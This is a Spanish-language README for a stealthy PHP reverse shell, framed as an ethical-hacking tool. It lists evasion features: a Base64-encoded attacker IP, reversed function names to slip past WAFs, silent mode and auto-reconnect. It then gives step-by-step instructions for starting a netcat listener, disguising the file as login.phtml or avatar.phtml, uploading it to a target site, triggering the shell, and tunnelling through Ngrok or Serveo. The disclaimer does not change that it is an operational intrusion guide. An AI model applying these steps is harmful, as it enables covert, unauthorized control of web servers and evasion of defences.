
Este es un potente y sigiloso reverse shell en PHP diseñado para hacking ético y pruebas de penetración. Establece una conexión confiable y silenciosa de vuelta a tu máquina.
Este es un potente y sigiloso PHP reverse shell diseñado para hacking ético y pruebas de penetración. Establece una conexión confiable y silenciosa de vuelta a tu máquina.
Este PHP reverse shell ha sido desarrollado estrictamente con fines educativos y de pruebas de penetración autorizadas.
El desarrollador no se hace responsable de ningún uso indebido, daño o actividad ilegal realizada con este reverse_shell.
Úsalo de manera responsable y solo en sistemas que poseas o para los que tengas permiso explícito de pruebas. El acceso no autorizado es ilegal y castigado por la ley.
La IP y el comando shell están codificados en Base64 para pasar desapercibido
Los nombres de las funciones están invertidos para evadir WAF y filtros de seguridad
Modo silencioso — no se muestra salida para evitar detección
Se reconecta automáticamente si la conexión se cae
Puede ejecutarse como un demonio en segundo plano (si el servidor lo permite)
Funciona en la mayoría de servidores con PHP habilitado
Soporta servicios de tunelización como Ngrok, Serveo
Subir con extensión .phtml para evadir algunos filtros
1. Inicia un listener en tu máquina
nc -lvnp 4444
2. Codifica tu IP o nombre de host en Base64
Usa este simple comando:
echo "your_ip_or_hostname" | base64
Ejemplo:
echo "192.168.1.5" | base64
Copia la salida y reemplaza el valor de $ip_b64 en el script PHP reverse shell.
3. Actualiza tu script PHP reverse shell:
Cambia estas líneas con tu IP/nombre de host codificada en Base64 y puerto:
$ip_b64 = 'YOUR_BASE64_ENCODED_IP_OR_HOSTNAME';
$port = YOUR_LISTENER_PORT;
4. Renombra el archivo y súbelo
Renombra el archivo a algo menos sospechoso, por ejemplo:
login.phtml
avatar.phtml
update.phtml
Usar la extensión .phtml ayuda a que el archivo se ejecute en algunos servidores que bloquean .php.
Sube este archivo al sitio web objetivo donde se permitan subidas de archivos.
5. Activa el reverse shell
Abre el archivo subido en un navegador:
http://target.com/uploads/login.phtml
Una vez abierto, tu listener recibirá una conexión reverse shell.
Si estás usando datos móviles o detrás de un router (NAT), tu IP podría no ser pública. En ese caso, el reverse shell no puede alcanzar tu máquina directamente.
Para solucionarlo, usa herramientas de tunelización TCP como Ngrok o Serveo.
Instala Ngrok
Ejecuta este comando:
ngrok tcp 4444
Mostrará algo como:
Forwarding tcp://4.tcp.ngrok.io:18900
Actualiza tu script PHP reverse shell:
$ip_b64 = base64_encoded of 4.tcp.ngrok.io;
$port = 18900;
Inicia tu listener:
nc -lvnp 4444
Ejecuta este comando:
ssh -R 0:localhost:4444 serveo.net
Dirá algo como:
Forwarding TCP connections from serveo.net:46603
Actualiza tu script PHP reverse shell:
$ip_b64 = base64_encoded of serveo.net;
$port = 46603;
Inicia tu listener:
nc -lvnp 4444
Este proyecto está licenciado bajo la GNU General Public License v3.0